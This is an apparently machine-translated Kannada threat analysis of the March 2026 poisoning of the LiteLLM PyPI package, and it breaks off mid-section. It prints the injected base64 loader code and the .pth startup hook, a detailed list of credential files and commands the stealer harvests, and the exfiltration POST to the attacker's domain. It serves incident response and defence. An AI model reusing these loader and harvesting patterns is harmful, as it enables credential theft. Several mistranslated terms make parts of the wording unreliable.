ಏಕೆ ಈ ವಿಷಯಗಳು
ಮಾರ್ಚ್ 24, 2026 ರಂದು, ಜನಪ್ರಿಯ ಪೈಥಾನ್ ಪ್ಯಾಕೇಜ್ ಲಿಟೆಲ್ಮ್, ಸಾವಿರಾರು ಜನರು ಬಳಸುವ ಸಾರ್ವತ್ರಿಕ LLM ಪ್ರಾಕ್ಸಿ ಗೇಟ್ವೇ enterpriseಅಪ್ಲಿಕೇಶನ್ಗಳು ಮತ್ತು ಓಪನ್ಎಐ, ಆಂಥ್ರೊಪಿಕ್, ಗೂಗಲ್ ಮತ್ತು ಎಡಬ್ಲ್ಯೂಎಸ್ ಬೆಡ್ರಾಕ್ನಂತಹ AI ಪೂರೈಕೆದಾರರ ನಡುವಿನ ಸಂಚಾರವನ್ನು ರೂಟ್ ಮಾಡಲು S ಅನ್ನು PyPI ನಲ್ಲಿ ಮೌನವಾಗಿ ರಾಜಿ ಮಾಡಿಕೊಳ್ಳಲಾಯಿತು. ಎರಡು ವಿಷಪೂರಿತ ಆವೃತ್ತಿಗಳನ್ನು (1.82.7 ಮತ್ತು 1.82.8) ಪರಸ್ಪರ 13 ನಿಮಿಷಗಳ ಒಳಗೆ ಪ್ರಕಟಿಸಲಾಯಿತು, ಅವುಗಳು ರುಜುವಾತುಗಳನ್ನು ಕದಿಯುವ ಬಹು-ಹಂತದ ಪೇಲೋಡ್ ಅನ್ನು ಹೊತ್ತೊಯ್ದವು, ಕ್ಲೌಡ್ ರಹಸ್ಯಗಳನ್ನು ಹೊರಹಾಕಿದವು, ಕುಬರ್ನೆಟ್ಸ್ ಕ್ಲಸ್ಟರ್ಗಳಲ್ಲಿ ಪಾರ್ಶ್ವವಾಗಿ ಹರಡಿದವು ಮತ್ತು ರಿಮೋಟ್ ಕೋಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್ ಸಾಮರ್ಥ್ಯಗಳೊಂದಿಗೆ ನಿರಂತರ ಹಿಂಬಾಗಿಲನ್ನು ಸ್ಥಾಪಿಸಿದವು.
ಜೊತೆಗೆ ಸರಿಸುಮಾರು ಪ್ರತಿದಿನ 3.6 ಮಿಲಿಯನ್ ಡೌನ್ಲೋಡ್ಗಳು ಮತ್ತು ಕ್ಲೌಡ್-ಸ್ಥಳೀಯ AI ಮೂಲಸೌಕರ್ಯದಾದ್ಯಂತ ಆಳವಾದ ನಿಯೋಜನೆಯೊಂದಿಗೆ, ಲಿಟೆಲ್ಮ್ ಆಧುನಿಕ ದಾಳಿಕೋರರು ಅಪೇಕ್ಷಿಸುವ ಎಲ್ಲದರ ಅಡ್ಡಹಾದಿಯಲ್ಲಿದೆ: ಪ್ರತಿ ಪ್ರಮುಖ AI ಪೂರೈಕೆದಾರರಿಗೆ API ಕೀಗಳು, ಕ್ಲೌಡ್ IAM ರುಜುವಾತುಗಳು, ಕುಬರ್ನೆಟ್ಸ್ ರಹಸ್ಯಗಳು ಮತ್ತು SSH ಕೀಗಳು.
ಆದರೆ ಲಿಟೆಲ್ಮ್ ರಾಜಿ ಒಂದು ಪ್ರತ್ಯೇಕ ಘಟನೆಯಾಗಿರಲಿಲ್ಲ. ಅದು ಒಂದು ಪರಾಕಾಷ್ಠೆಯಾಗಿತ್ತು ಐದು ದಿನಗಳ, ಐದು-ಪರಿಸರ ವ್ಯವಸ್ಥೆ ಅಭಿಯಾನ ಎಂದು ಕರೆಯಲ್ಪಡುವ ಬೆದರಿಕೆ ನಟನಿಂದ ತಂಡ ಪಿಸಿಪಿ, ಮೊದಲು ಭದ್ರತಾ ಸ್ಕ್ಯಾನರ್ಗಳನ್ನು (ಅಕ್ವಾ ಟ್ರಿವಿ, ಚೆಕ್ಮಾರ್ಕ್ಸ್ KICS) ವಿಷಪೂರಿತಗೊಳಿಸಿದ ಅಭಿಯಾನ, ನಂತರ ಕದ್ದದ್ದನ್ನು ಬಳಸಿತು CI/CD npm, OpenVSX, ಮತ್ತು ಅಂತಿಮವಾಗಿ PyPI ಗೆ ಕೆಳಮುಖವಾಗಿ ಕ್ಯಾಸ್ಕೇಡ್ ಮಾಡಲು ರುಜುವಾತುಗಳು. ದಾಳಿಕೋರರು ಸಂಸ್ಥೆಗಳು ತಮ್ಮ ಪೂರೈಕೆ ಸರಪಳಿಗಳನ್ನು ರಕ್ಷಿಸಲು ಅವಲಂಬಿಸಿರುವ ಸಾಧನಗಳನ್ನೇ ಶಸ್ತ್ರಾಸ್ತ್ರಗಳನ್ನಾಗಿ ಮಾಡಿಕೊಂಡರು.
ಈ ದಾಳಿಯು ಪೂರೈಕೆ ಸರಪಳಿ ಬೆದರಿಕೆಯ ಅತ್ಯಾಧುನಿಕತೆಯಲ್ಲಿ ಒಂದು ಹಂತದ ಬದಲಾವಣೆಯನ್ನು ಪ್ರತಿನಿಧಿಸುತ್ತದೆ. ಮಲ್ಟಿ-ಹಾಪ್, ಕ್ರಾಸ್-ಇಕೋಸಿಸ್ಟಮ್ ವಿನ್ಯಾಸ, ಹೆಚ್ಚಿನ ಮೌಲ್ಯವನ್ನು ತಲುಪಲು ಭದ್ರತಾ ಪರಿಕರಗಳನ್ನು ರಾಜಿ ಮಾಡಿಕೊಳ್ಳುವುದು AI ಮೂಲಸೌಕರ್ಯ, ಹೆಚ್ಚುತ್ತಿರುವ ಸರಕುಗೊಳಿಸಿದ ದಾಳಿ ಪರಿಕರಗಳಿಗೆ ಅನುಗುಣವಾಗಿ ಯೋಜನೆ ಮತ್ತು ಕಾರ್ಯಾಚರಣೆಯ ಪರಿಪಕ್ವತೆಯ ಮಟ್ಟವನ್ನು ಪ್ರತಿಬಿಂಬಿಸುತ್ತದೆ. ಪೇಲೋಡ್ಗಳನ್ನು ನೈಜ ಸಮಯದಲ್ಲಿ ಪುನರಾವರ್ತಿಸಲಾಯಿತು (ಕಾಮೆಂಟ್ ಮಾಡಿದ ಹಿಂದಿನ ಆವೃತ್ತಿಗಳನ್ನು ಒಳಗೊಂಡಂತೆ ಮೂರು ಪೇಲೋಡ್ ರೂಪಾಂತರಗಳು ಮೂಲ ಕೋಡ್ನಲ್ಲಿ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತವೆ), ದಾಳಿಯ ಹಿಂದಿನ ದಿನ C2 ಮೂಲಸೌಕರ್ಯವನ್ನು ನೋಂದಾಯಿಸಲಾಯಿತು ಮತ್ತು ಕಾನೂನುಬದ್ಧ ಮಾರಾಟಗಾರರ ಮೂಲಸೌಕರ್ಯವನ್ನು ಅನುಕರಿಸಲು ಹೊರಹರಿವಿನ ಡೊಮೇನ್ಗಳನ್ನು ಎಚ್ಚರಿಕೆಯಿಂದ ಆಯ್ಕೆ ಮಾಡಲಾಯಿತು. ಕಾರ್ಡಾನೊ ಸೈನಿಂಗ್ ಕೀಗಳು ಮತ್ತು ವೈರ್ಗಾರ್ಡ್ ಕಾನ್ಫಿಗ್ಗಳಂತಹ ಸ್ಥಾಪಿತ ಗುರಿಗಳನ್ನು ಒಳಗೊಂಡಂತೆ 15+ ವಿಭಾಗಗಳನ್ನು ಒಳಗೊಂಡ ವ್ಯವಸ್ಥಿತವಾಗಿ ಸಮಗ್ರ ರುಜುವಾತು ಹಾರ್ವೆಸ್ಟರ್, ಬಲ ಗುಣಕವಾಗಿ AI- ನೆರವಿನ ಮಾಲ್ವೇರ್ ಅಭಿವೃದ್ಧಿಯ ಕಡೆಗೆ ಸೂಚಿಸುವ ಸಂಪೂರ್ಣ ಮಟ್ಟವನ್ನು ಸೂಚಿಸುತ್ತದೆ.
ಟೈಮ್ಲೈನ್
| ದಿನಾಂಕ (UTC) | ಈವೆಂಟ್ |
|---|---|
| ಮಾರ್ಚ್ 19 | TeamPCP ಅಕ್ವಾ ಟ್ರಿವಿ ಗಿಟ್ಹಬ್ ಆಕ್ಷನ್ ಟ್ಯಾಗ್ಗಳನ್ನು ರಾಜಿ ಮಾಡಿಕೊಳ್ಳುತ್ತದೆ, ಅವುಗಳನ್ನು ಹೊರಹಾಕುವ ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ನೊಂದಿಗೆ ಬದಲಾಯಿಸುತ್ತದೆ. CI/CD ಕೆಳಮಟ್ಟದ ಭಂಡಾರಗಳಿಂದ ರಹಸ್ಯಗಳು |
| ಮಾರ್ಚ್ 21 | ಇದೇ ರೀತಿಯ ತಂತ್ರಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಚೆಕ್ಮಾರ್ಕ್ಸ್ KICS ಮತ್ತು AST ಗಿಟ್ಹಬ್ ಕ್ರಿಯೆಗಳಿಗೆ ರಾಜಿ ವಿಸ್ತರಿಸುತ್ತದೆ. |
| ಮಾರ್ಚ್ 22, 06:35 | BerriAI ಸಾಮಾನ್ಯ ಮೂಲಕ litellm 1.82.6 (ಕೊನೆಯ ಕ್ಲೀನ್ ಆವೃತ್ತಿ) ಅನ್ನು ಪ್ರಕಟಿಸುತ್ತದೆ CI/CD pipeline ಅದು ಭದ್ರತಾ ಸ್ಕ್ಯಾನಿಂಗ್ಗಾಗಿ ಟ್ರಿವಿಯನ್ನು ಬಳಸುತ್ತದೆ |
| ಮಾರ್ಚ್ 23 | TeamPCP models.litellm.cloud (exfiltration ಡೊಮೇನ್) ಅನ್ನು ನೋಂದಾಯಿಸುತ್ತದೆ. 66+ npm ಪ್ಯಾಕೇಜ್ಗಳು ಮತ್ತು OpenVSX ವಿಸ್ತರಣೆಗಳನ್ನು ರಾಜಿ ಮಾಡುತ್ತದೆ. |
| ಮಾರ್ಚ್ 24, 10:39 | litellm 1.82.7 ಅನ್ನು PyPI ಗೆ ಪ್ರಕಟಿಸಲಾಗಿದೆ -- ಪೇಲೋಡ್ ಅನ್ನು ಇಂಜೆಕ್ಟ್ ಮಾಡಲಾಗಿದೆ proxy_server.py ಮಾಡ್ಯೂಲ್ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ. ಆಮದು ಮಾಡಿಕೊಂಡಾಗ ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ |
| ಮಾರ್ಚ್ 24, 10:52 | litellm 1.82.8 13 ನಿಮಿಷಗಳ ನಂತರ ಪ್ರಕಟವಾಯಿತು -- ಸೇರಿಸುತ್ತದೆ litellm_init.pth, ಇದು ಲಿಟೆಲ್ಮ್ ಆಮದುಗಳಲ್ಲದೆ, ಪ್ರತಿಯೊಂದು ಪೈಥಾನ್ ಇಂಟರ್ಪ್ರಿಟರ್ ಸ್ಟಾರ್ಟ್ಅಪ್ನಲ್ಲಿ ಕಾರ್ಯಗತಗೊಳಿಸುವ ಪೈಥಾನ್ ಪಾತ್ ಕಾನ್ಫಿಗರೇಶನ್ ಹುಕ್ ಆಗಿದೆ. ಕ್ಷಿಪ್ರ ಪೇಲೋಡ್ ಪುನರಾವರ್ತನೆಯನ್ನು ತೋರಿಸುತ್ತದೆ. |
| ಮಾರ್ಚ್ 24, ~16:00 | ಸಮುದಾಯ ವರದಿಗಳ ನಂತರ PyPI ಎರಡೂ ಆವೃತ್ತಿಗಳನ್ನು ತೆಗೆದುಹಾಕುತ್ತದೆ. ಆವೃತ್ತಿಗಳನ್ನು ಸೂಚ್ಯಂಕದಿಂದ ಸಂಪೂರ್ಣವಾಗಿ ಅಳಿಸಲಾಗುತ್ತದೆ (ಹಿಂತೆಗೆದುಕೊಳ್ಳಲಾಗುವುದಿಲ್ಲ), ಆದರೂ CDN ಟಾರ್ಬಾಲ್ಗಳು ಪ್ರವೇಶಿಸಬಹುದಾಗಿದೆ. |
ಎಕ್ಸ್ಪೋಸರ್ ವಿಂಡೋ: ಸರಿಸುಮಾರು 5.5 ಗಂಟೆಗಳು. ಈ ಸಮಯದಲ್ಲಿ, ಯಾವುದೇ pip install litellm, pip install --upgrade litellm, ಅಥವಾ CI/CD pipeline ಇತ್ತೀಚಿನ ಆವೃತ್ತಿಯನ್ನು ಎಳೆಯುವುದರಿಂದ ಪೇಲೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದಿತ್ತು.
ಮಾಲ್ವೇರ್ ಹೇಗೆ ಪ್ರವೇಶಿಸಿತು: ಕ್ಯಾಸ್ಕೇಡಿಂಗ್ ರಾಜಿ
ಲಿಟೆಲ್ಮ್ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ನೇರವಾಗಿ ಭೇದಿಸಲಾಗಿಲ್ಲ. ದಾಳಿಕೋರನು ಅದನ್ನು ಒಂದು ಮೂಲಕ ತಲುಪಿದನು ಎರಡು-ಹಾಪ್ ಪೂರೈಕೆ ಸರಪಳಿ ದಾಳಿ:
Aqua Trivy GitHub Action (compromised March 19) --> LiteLLM CI/CD pipeline runs Trivy without pinned version --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI ಲೈಟ್ಎಲ್ಎಲ್ಎಂಗಳು CI/CD pipeline ಟ್ರಿವಿಯನ್ನು ಭದ್ರತಾ ಸ್ಕ್ಯಾನರ್ ಆಗಿ ಬಳಸಿದರು - ದುರ್ಬಲತೆಗಳನ್ನು ಹಿಡಿಯಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ ಸಾಧನವೇ ದಾಳಿ ವೆಕ್ಟರ್ ಆಗಿತ್ತು. ಏಕೆಂದರೆ pipeline ಪಿನ್ ಮಾಡಿದ ಟ್ಯಾಗ್ಗಿಂತ ಮ್ಯುಟಬಲ್ ಟ್ಯಾಗ್ ಮೂಲಕ ಟ್ರಿವಿಯನ್ನು ಉಲ್ಲೇಖಿಸಲಾಗಿದೆ. commit SHA, ರಾಜಿ ಮಾಡಿಕೊಂಡ ಕ್ರಿಯೆಯು ಸ್ವಯಂಚಾಲಿತವಾಗಿ ನಡೆಯಿತು. ದುರುದ್ದೇಶಪೂರಿತ ಟ್ರಿವಿ ಕ್ರಿಯೆಯು ಪರಿಸರ ರಹಸ್ಯಗಳನ್ನು ಹೊರಹಾಕಿತು, ಅದರಲ್ಲಿ PYPI_PUBLISH ಟೋಕನ್, ಇದು TeamPCP ಗೆ litellm PyPI ಯೋಜನೆಗೆ ನೇರ ಪ್ರಕಟಣೆಯ ಪ್ರವೇಶವನ್ನು ನೀಡುತ್ತದೆ.
ಈ "ಗಾರ್ಡ್ಗಳನ್ನು ರಾಜಿ ಮಾಡಿಕೊಳ್ಳಿ" ಎಂಬ ತಂತ್ರವು TeamPCP ಅಭಿಯಾನದ ವಿಶಿಷ್ಟ ಲಕ್ಷಣವಾಗಿದೆ. ಭದ್ರತಾ ಸಾಧನಗಳನ್ನು ಮೊದಲು ಗುರಿಯಾಗಿಸಿಕೊಳ್ಳುವ ಮೂಲಕ (ಟ್ರಿವಿ, ಚೆಕ್ಮಾರ್ಕ್ಸ್ KICS), ದಾಳಿಕೋರರು ಏಕಕಾಲದಲ್ಲಿ ಪತ್ತೆಹಚ್ಚುವಿಕೆಯನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿದರು ಮತ್ತು ಕೆಳಮಟ್ಟದ ಪೂರೈಕೆ ಸರಪಳಿಗಳಿಗೆ ವಿಶೇಷ ಪ್ರವೇಶವನ್ನು ಪಡೆದರು.
ತಾಂತ್ರಿಕ ವಿಶ್ಲೇಷಣೆ: ಪೇಲೋಡ್
ಇಂಜೆಕ್ಷನ್ ಪಾಯಿಂಟ್ಗಳು
ಆವೃತ್ತಿ 1.82.7 — ಮಾಡ್ಯೂಲ್-ಮಟ್ಟದ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆ litellm/proxy/proxy_server.py (ಸಾಲು 128):
import subprocess, base64, sys, tempfile, os b64_payload = "<~12KB base64 blob>" with tempfile.TemporaryDirectory() as d: p = os.path.join(d, "p.py") with open(p, "wb") as f: f.write(base64.b64decode(b64_payload)) subprocess.run([sys.executable, p]) ಈ ಕೋಡ್ ನಿಘಂಟು ಅಕ್ಷರಶಃ ಮತ್ತು ಮೂಲ ನಡುವಿನ ಮಾಡ್ಯೂಲ್ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ಇರುತ್ತದೆ. showwarning() ಕಾರ್ಯ. ಅದು ತಕ್ಷಣವೇ ಕಾರ್ಯಗತಗೊಳ್ಳುತ್ತದೆ litellm.proxy.proxy_server ಆಮದು ಮಾಡಿಕೊಳ್ಳಲಾಗಿದೆ — ಇದು ಲಿಟೆಲ್ಮ್ನ ಪ್ರಾಕ್ಸಿ ಕಾರ್ಯನಿರ್ವಹಣೆಯ ಯಾವುದೇ ಬಳಕೆಯ ಮೇಲೆ ಸಂಭವಿಸುತ್ತದೆ.
ಆವೃತ್ತಿ 1.82.8 — ಸೇರಿಸಲಾಗಿದೆ litellm_init.pth (ಪೈಥಾನ್ ಮಾರ್ಗ ಸಂರಚನಾ ಕಡತ):
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) ಪೈಥಾನ್ .pth ಫೈಲ್ಗಳು site-packages/ ಪ್ರತಿ ಇಂಟರ್ಪ್ರಿಟರ್ ಸ್ಟಾರ್ಟ್ಅಪ್ನಲ್ಲಿ ಪ್ರಕ್ರಿಯೆಗೊಳಿಸಲಾಗುತ್ತದೆ, ಆದರೆ ಪ್ರಾರಂಭವಾಗುವ ಸಾಲುಗಳು ಮಾತ್ರ import ಕೋಡ್ ಆಗಿ ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗುತ್ತದೆ. ದಾಳಿಕೋರನು ಸಂಪೂರ್ಣ ಪೇಲೋಡ್ ಅನ್ನು ಒಂದೇ ಒಂದಕ್ಕೆ ಜೋಡಿಸುವ ಮೂಲಕ ಇದನ್ನು ಬಳಸಿಕೊಳ್ಳುತ್ತಾನೆ. import ಹೇಳಿಕೆ: import os, subprocess, sys; subprocess.Popen(...). ಇದು proxy_server.py ಇಂಜೆಕ್ಷನ್ಗಿಂತ ಹೆಚ್ಚು ಆಕ್ರಮಣಕಾರಿಯಾಗಿದೆ - ಪ್ರತಿ ಪೈಥಾನ್ ಪ್ರಕ್ರಿಯೆಯ ಉಡಾವಣೆಯಲ್ಲಿ litellm ಅನ್ನು ಎಂದಿಗೂ ಆಮದು ಮಾಡಿಕೊಳ್ಳದಿದ್ದರೂ ಸಹ ಇದು ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ. ದಿ pyproject.toml ಈ ಫೈಲ್ ಅನ್ನು ವಿತರಣೆಯಲ್ಲಿ ಸೇರಿಸಲು ಮಾರ್ಪಡಿಸಲಾಗಿದೆ:
include = [ { path = "litellm_init.pth", format = ["sdist", "wheel"] } ] ಆವೃತ್ತಿ 1.82.8 ಹೀಗೆ ಹೊಂದಿದೆ ಎರಡು ಸ್ವತಂತ್ರ ಮರಣದಂಡನೆ ಮಾರ್ಗಗಳು: proxy_server.py ಇಂಜೆಕ್ಷನ್ (litellm ಪ್ರಾಕ್ಸಿ ಇಂಪೋರ್ಟ್ನಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ) ಮತ್ತು .pth ಫೈಲ್ (ಯಾವುದೇ ಪೈಥಾನ್ ಸ್ಟಾರ್ಟ್ಅಪ್ನಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ). ಪುನರುಕ್ತಿ ಸ್ವತಃ ಗಮನಾರ್ಹವಾಗಿದೆ - ಇದು ಎರಡೂ ಮಾರ್ಗಗಳ ಪತ್ತೆ ಅಥವಾ ತೆಗೆದುಹಾಕುವಿಕೆಯನ್ನು ತಡೆಯುತ್ತದೆ. 1.82.7 ರ ನಂತರ ಕೇವಲ 13 ನಿಮಿಷಗಳ ನಂತರ ಆಮದು-ಸಮಯದಿಂದ ಪ್ರಾರಂಭ-ಸಮಯದ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಗೆ ಏರಿಕೆಯು ಆಕ್ರಮಣಕಾರನು ನಿಯೋಜನೆಯ ಯಶಸ್ಸನ್ನು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡುತ್ತಿದ್ದನು ಮತ್ತು ವೇಗವಾಗಿ ಪುನರಾವರ್ತಿಸುತ್ತಿದ್ದನು ಎಂದು ಸೂಚಿಸುತ್ತದೆ.
ಹಂತ 1: ಸಮಗ್ರ ರುಜುವಾತು ಕೊಯ್ಲು
ಡಿಕೋಡ್ ಮಾಡಲಾದ ಒಳಗಿನ ಲಿಪಿಯು ಒಂದು ನಿಖರವಾದ ರುಜುವಾತು ನಿರ್ವಾತವಾಗಿದೆ. ಇದು ಬಳಸುತ್ತದೆ os.walk(), glob.glob(), subprocess.check_output(), ಮತ್ತು ಸಂಪೂರ್ಣ ವ್ಯವಸ್ಥೆಯನ್ನು ಸ್ವಚ್ಛಗೊಳಿಸಲು ಫೈಲ್ ರೀಡ್ಗಳನ್ನು ನಿರ್ದೇಶಿಸಿ:
| ವರ್ಗ | ಗುರಿಗಳು |
|---|---|
| ಸಿಸ್ಟಮ್ ರೀಕಾನ್ | hostname, whoami, uname -a, ip addr, printenv, ip route |
| SSH | ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; ಹೋಸ್ಟ್ ಕೀಗಳು ನಿಂದ /etc/ssh/ |
| ಕ್ಲೌಡ್ (AWS) | ~/.aws/credentials, ~/.aws/config; IMDS ಪಾತ್ರ ರುಜುವಾತುಗಳು ಮೂಲಕ 169.254.169.254; ರಹಸ್ಯ ವ್ಯವಸ್ಥಾಪಕ ListSecrets; ಎಸ್ಎಸ್ಎಂ DescribeParameters |
| ಕ್ಲೌಡ್ (GCP) | ~/.config/gcloud/ (ಪುನರಾವರ್ತಿತ); $GOOGLE_APPLICATION_CREDENTIALS |
| ಮೋಡ (ನೀಲಿ ಬಣ್ಣ) | ~/.azure/ (ಪುನರಾವರ್ತಿತ); ಪರಿಸರ ವೇರಿಯೇಬಲ್ಗಳು |
| ಕುಬರ್ನೆಟ್ಸ್ | ಸೇವಾ ಖಾತೆ ಟೋಕನ್ಗಳು; ca.crtನಾಮಸ್ಥಳ; kubectl get secrets --all-namespaces; K8s API ಮೂಲಕ ಎಲ್ಲಾ ರಹಸ್ಯಗಳು |
| ಪರಿಸರ ಫೈಲ್ಗಳು | .env, .env.local, .env.production, .env.development, .env.staging — ಪುನರಾವರ್ತಿತವಾಗಿ (ಆಳ 6) ಹುಡುಕಲಾಗಿದೆ /home, /root, /opt, /srv, /var/www, /app, /data, /tmp |
| ಡಾಕರ್ | ~/.docker/config.json, /kaniko/.docker/config.json |
| ಪ್ಯಾಕೇಜ್ ಟೋಕನ್ಗಳು | ~/.npmrc, ~/.vault-token, ~/.netrc |
| ಡೇಟಾಬೇಸ್ಗಳು | ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, MongoDB ಸಂರಚನೆಗಳು |
| ಟಿಎಲ್ಎಸ್ / ಎಸ್ಎಸ್ಎಲ್ | ನಿಂದ ಖಾಸಗಿ ಕೀಲಿಗಳು /etc/ssl/private/, ಪ್ರಮಾಣಪತ್ರಗಳನ್ನು ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡೋಣ, ಎಲ್ಲವೂ .pem/.key/.p12/.pfx ಕಡತಗಳನ್ನು |
| ಹೋಗಿ | ~/.git-credentials, ~/.gitconfig |
| CI/CD | terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg |
| ಕ್ರಿಪ್ಟೋ ತೊಗಲಿನ ಚೀಲಗಳು | ಬಿಟ್ಕಾಯಿನ್, ಎಥೆರಿಯಮ್ ಕೀಸ್ಟೋರ್, ಸೋಲಾನಾ ಕೀಜೋಡಿಗಳು (ವ್ಯಾಲಿಡೇಟರ್, ಮತ, ಪಾಲು, ನಲ್ಲಿ), ಕಾರ್ಡಾನೊ ಸಹಿ ಮಾಡುವ ಕೀಗಳು, ಲಿಟ್ಕಾಯಿನ್, ಡಾಗ್ಕಾಯಿನ್, ಝಡ್ಕ್ಯಾಶ್, ಡ್ಯಾಶ್, ರಿಪ್ಪಲ್, ಮೊನೆರೊ |
| ಶೆಲ್ ಇತಿಹಾಸ | .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history |
| ಸಿಸ್ಟಮ್ ದೃಢೀಕರಣ | /etc/passwd, /etc/shadow, ದೃಢೀಕರಣ ದಾಖಲೆಗಳು (ಸ್ವೀಕರಿಸಲಾದ SSH ಅವಧಿಗಳು) |
| ವೆಬ್ಹುಕ್/API ಕೀಗಳು | ಸ್ಲಾಕ್ ವೆಬ್ಗಾಗಿ ಗ್ರೆಪ್hooks, ಡಿಸ್ಕಾರ್ಡ್ ವೆಬ್hooks, ಸಂರಚನಾ ಕಡತಗಳಲ್ಲಿ API ಕೀಗಳು/ರಹಸ್ಯಗಳು |
| VPN | ನಿಂದ ವೈರ್ಗಾರ್ಡ್ ಸಂರಚನೆಗಳು /etc/wireguard/ |
ಈ ಹಾರ್ವೆಸ್ಟರ್ನ ವ್ಯಾಪ್ತಿಯು ವಿಶ್ವಕೋಶೀಯವಾಗಿದೆ. ಇದು ಕೇವಲ ಕ್ಲೌಡ್ ರುಜುವಾತುಗಳನ್ನು ಮಾತ್ರವಲ್ಲದೆ ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ ವ್ಯಾಲೆಟ್ಗಳು, ಡೇಟಾಬೇಸ್ ಪಾಸ್ವರ್ಡ್ಗಳು, VPN ಕಾನ್ಫಿಗರೇಶನ್ಗಳು ಮತ್ತು CI/CD ರಹಸ್ಯಗಳು - ದಾಳಿಕೋರನು ಬಹು ವೆಕ್ಟರ್ಗಳಲ್ಲಿ ರಾಜಿ ಮಾಡಿಕೊಂಡ ವ್ಯವಸ್ಥೆಗಳಿಂದ ಹಣ ಗಳಿಸಲು ಉದ್ದೇಶಿಸಿದ್ದಾನೆ ಎಂದು ಸೂಚಿಸುತ್ತದೆ.
ಹಂತ 2: ಎನ್ಕ್ರಿಪ್ಟೆಡ್ ಎಕ್ಸ್ಫಿಲ್ಟ್ರೇಶನ್
ಕದ್ದ ಡೇಟಾವನ್ನು ಹೈಬ್ರಿಡ್ ಎನ್ಕ್ರಿಪ್ಶನ್ ಸ್ಕೀಮ್ ಬಳಸಿ ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗುತ್ತದೆ ಮತ್ತು ಹೊರಹಾಕಲಾಗುತ್ತದೆ:
- ಎಇಎಸ್ -256-ಸಿಬಿಸಿ ಯಾದೃಚ್ಛಿಕ 32-ಬೈಟ್ ಸೆಷನ್ ಕೀಲಿಯೊಂದಿಗೆ ಎಲ್ಲಾ ಸಂಗ್ರಹಿಸಿದ ಡೇಟಾದ ಎನ್ಕ್ರಿಪ್ಶನ್ (ಮೂಲಕ
openssl enc) - ಆರ್ಎಸ್ಎ-4096 ದಾಳಿಕೋರನ ಎಂಬೆಡೆಡ್ ಸಾರ್ವಜನಿಕ ಕೀಲಿಯನ್ನು ಬಳಸಿಕೊಂಡು ಸೆಷನ್ ಕೀಲಿಯ ಎನ್ಕ್ರಿಪ್ಶನ್ (OAEP ಪ್ಯಾಡಿಂಗ್, ಮೂಲಕ
openssl pkeyutl) - ಎರಡೂ ಸೈಫರ್ಟೆಕ್ಸ್ಟ್ ಫೈಲ್ಗಳನ್ನು ಹೀಗೆ ಬಂಡಲ್ ಮಾಡಲಾಗಿದೆ
tpcp.tar.gz(ದಿtpcpಪೂರ್ವಪ್ರತ್ಯಯ — “TeamPCP” — ಅಭಿಯಾನದಾದ್ಯಂತ ಸ್ಥಿರವಾಗಿ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತದೆ) - HTTPS ಪೋಸ್ಟ್
https://models.litellm.cloud/ಜೊತೆContent-Type: application/octet-stream
ಡೊಮೇನ್ models.litellm.cloud ದಾಳಿಯ ಒಂದು ದಿನ ಮೊದಲು - ಮಾರ್ಚ್ 23 ರಂದು ನೋಂದಾಯಿಸಲಾಗಿದೆ ಮತ್ತು ಕಾನೂನುಬದ್ಧ ಲಿಟೆಲ್ಮ್ ಮೂಲಸೌಕರ್ಯದೊಂದಿಗೆ ಮಿಶ್ರಣ ಮಾಡಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ (ನಿಜವಾದ ಯೋಜನೆಯು ಬಳಸುತ್ತದೆ litellm.ai). ನಿರ್ಗಮನ ದಟ್ಟಣೆಯನ್ನು ಪರಿಶೀಲಿಸುವ ನೆಟ್ವರ್ಕ್-ಅರಿವುಳ್ಳ ರಕ್ಷಕನು ಸಹ ಲಿಟೆಲ್ಮ್ನ ಸ್ವಂತ ಮಾದರಿಯ ಅಂತಿಮ ಬಿಂದುವಿನಂತೆ ಕಾಣುವ ಟ್ರಾಫಿಕ್ ಅನ್ನು ಫ್ಲ್ಯಾಗ್ ಮಾಡದಿರಬಹುದು.
ಹಂತ 3: ನಿರಂತರ ಬ್ಯಾಕ್ಡೋರ್ (sysmon.py)
ಪೇಲೋಡ್ ಸಿಸ್ಟಮ್ ಟೆಲಿಮೆಟ್ರಿಯಂತೆ ವೇಷ ಧರಿಸಿ ಮತದಾನದ ಹಿಂಬಾಗಿಲನ್ನು ಸ್ಥಾಪಿಸುತ್ತದೆ:
- ಪಾಥ್:
~/.config/sysmon/sysmon.py - ಸೇವೆ:
